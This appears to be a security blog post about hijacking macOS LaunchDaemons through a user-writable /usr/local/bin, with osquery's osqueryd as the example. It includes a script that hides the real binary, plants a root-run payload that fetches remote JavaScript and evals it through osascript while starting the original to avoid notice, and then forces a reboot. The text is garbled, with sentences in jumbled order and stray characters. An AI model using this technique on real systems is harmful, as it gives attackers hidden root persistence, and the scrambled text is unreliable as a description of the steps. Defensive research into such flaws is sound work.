Modify any binary referenced by /Library/LaunchDaemons/*.plist.Create files within /Library/LaunchDaemons.Modify any file within /Library/LaunchDaemons.The change in /usr/local/bin permissions during a Homebrew install is a particularly common cause of this issue.Ī secure (non-hijackable) LaunchDaemon needs to look like this:Īll four of those padlocks needs to be correctly present to avoid being vulnerable. OSQuery is not alone in being vulnerable to this technique. Once exploited, the system looks like this: This step is optional but otherwise we won’t get code execution until the user restarts themselves. Finally it reboots the machine to force the OSQuery LaunchDaemon to restart.Starts the original osqueryd binary in the background (to help avoid anyone noticing the LaunchDaemon has been hijacked).It then creates a payload in /usr/local/bin/osqueryd that:.Firstly it moves the real osqueryd binary to a hidden folder.This short script demonstrates a complete LaunchDaemon Hijack: Osascript -e 'tell application "System Events" to restart' Our payload will be started as root on start-up usr/bin/osascript -l JavaScript -e "eval(ObjC.unwrap($.($.NSData.dataWithContentsOfURL($.NSURL.URLWithString('')),$.NSUTF8StringEncoding))) "ĮOF # 3. # Firstly start the original osqueryd binary in the background Mv /usr/local/bin/osqueryd /usr/local/bin/.osquery/osqueryd Move the original osqueryd binary somewhere else Create files in this folder-for example, some malware named osqueryd.Delete files in this folder-for example, the real osqueryd binary.Now, although a normal user can’t modify the /usr/local/bin/osqueryd file directly, they can simply replace it!īecause /usr/local/bin is globally writeable, any user on the system has permission to: Many people install a package manager called Homebrew which, during installation, makes the /usr/local/bin folder writable by the current user (even if they’re not an admin). While /usr/local/bin is a secure folder to store binaries on a default MacOS install, this isn’t the case on many real-world systems.
0 Comments
Leave a Reply. |
Details
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |